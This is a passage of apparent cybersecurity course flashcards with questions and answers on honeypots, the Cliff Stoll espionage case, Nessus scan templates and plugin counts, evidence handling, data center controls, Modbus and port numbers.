His girlfriend suggested creating a trove of fake documents so that the attacker would have to spend a long time downloading them all. They also decided to include a mail-in form requesting more information, on the off chance that the attacker would fill it out.

126
Q
What are four characteristics of a tactical honeypot? Written in your own words.
A

A honeypot located in your own network (on your side of the firewall)
A honeypot that looks like the actual systems on your network
A honeypot that is low interaction, so an attacker cannot do much with it
A honeypot that is set up to log as much as possible and alert the proper people when an incident occurs

127
Q
What is the name of one of the tools that can be used to create Canarytokens?
A

Canarytokens.org

128
Q
Where is it determined that the attacker’s calls are originating from?
A

Hannover, West Germany

129
Q
Cliff Stoll visits the NSA and meets Bob Morris. What is significant about Bob Morris’ son?
A

He (Robert Tappan Morris) wrote the Morris worm of 1988, the first worm to spread widely across the Internet.

130
Q
Reviewing the default set of ‘Scan Templates’ provided, what is the name of the malware that is associated with the MS17-010 vulnerability?
A

WannaCry

131
Q
  1. How would someone address the MS17-010 vulnerability on a vulnerable Windows host?
A

Update Windows

132
Q
  1. On the ‘Discovery’ selection page, what does the ‘ARP’ option do?
A

Sets the scan to ping hosts with Address Resolution Protocol

133
Q
  1. If you wanted to ensure you scanned all available TCP ports rather than just the default set of ports, what would you enter in the ‘Port scan range’ field?
A

all

134
Q
  1. On the ‘Credentials’ tab, what three options exist for supplying credentials?
A

SNMPv3
SSH
Windows

135
Q
  1. Of the three options for supplying ‘Credentials’, which is the one that would most likely be used by Nessus to login to a Linux-based host?
A

SSH

136
Q
  1. How many plugin checks exist to check for vulnerabilities in various DNS services?
A

202

137
Q
  1. How many plugin checks exist to check for vulnerabilities in Industrial Control Systems? HINT: As discussed in class, these would be Industrial Controls Systems deployed over long geographic distances.
A

3

138
Q
  1. How many total plugin checks exist to search for the presence of vulnerabilities on Windows hosts?
A

5008

139
Q
  1. What type of password attack is described as used by the attacker and characterized by Bob Morris as “child’s play”?
A

Dictionary Attack

140
Q
  1. What is the name of the persona used by the attacker to submit a request for physical files?
A

Laszlo J. Balogh

141
Q
  1. What are four concerns discussed with regards to evidence handling? Describe each. (25 - 50 words each)
A

Permission: You need permission to gather the evidence. If you do not have proper authorization such as a warrant, the evidence may be illegal and possibly not accepted in court.

Volatility: Can the data or evidence be lost under certain circumstances? Many types of evidence can be temporary or fragile. In these cases, care needs to be taken to gather information without damaging or losing anything.

Pollution: Attempts to gather information from evidence can result in the damage or destruction of information. For example, if you install software on a computer to gather information from it, the very act of installing it could tamper with the computer’s memory, storage, and logs.

Chain of Custody: There needs to be a record of everyone who has had custody of the evidence. Evidence should always be held by people qualified and trustworthy. If there is not a good record or someone unqualified or untrustworthy is in possession, the evidence could be damaged or tampered with.

142
Q
  1. What is one good practice of evidence acquisition? (25 - 50 words)
A

Create a snapshot of the system memory. This allows the contents of the otherwise volatile RAM to be kept in a safe, nonvolatile location for analysis even if the computer loses power.

143
Q
  1. What is the name of the primary attacker?
A

Markus Hess

144
Q
  1. What confidential information of Cliff’s was exposed to the public and how did it occur?
A

Cliff’s logbook. Likely because the FBI gave a copy to the German Attaché who gave it to the German media.

145
Q
  1. What ultimately happened to Karl “Hagbard” Koch?
A

Died under unusual circumstances. His death was ruled a suicide, but there is evidence that it may not have been.

146
Q
  1. What does Pengo think is one thing wrong with the cyber security industry (that Chris agrees with)?
A

Cyber security is an easy area in which to sell “snake oil”.

147
Q
  1. What does Pengo feel is essential knowledge for someone wanting to become a cyber security professional?
A

A deep understanding of how systems work is necessary for a security professional to be able to help their clients.

148
Q
  1. If your company had a data center, what would be three different types of environmental controls you would expect it to have?
A

HVAC
Fire suppression (Class C especially)
Faraday cage or similar EM disruption protection

149
Q
  1. Provide an overview of a “hot aisle/cold aisle” configuration. (25 – 50 words)
A

Hot aisle/cold aisle is a data center layout that is designed to maximize cooling and airflow. It is accomplished by alternating the direction each row of server racks faces. This creates “cold aisles” where air is drawn into the racks and “hot aisles” where the exhaust air is blown out.

150
Q
  1. Provide an overview of Modbus
A

Modbus is an industrial control protocol for connecting industrial systems. It allows industrial systems to communicate with each other.

151
Q
  1. What is the name of at least one Nmap NSE script which could be used to perform specific testing against the service from Step #8?
A

modbus-discover, which enumerates Modbus slave ids and device info

152
Q
port 123
A

Network Time Protocol (NTP)

153
Q
port 161
A

SNMP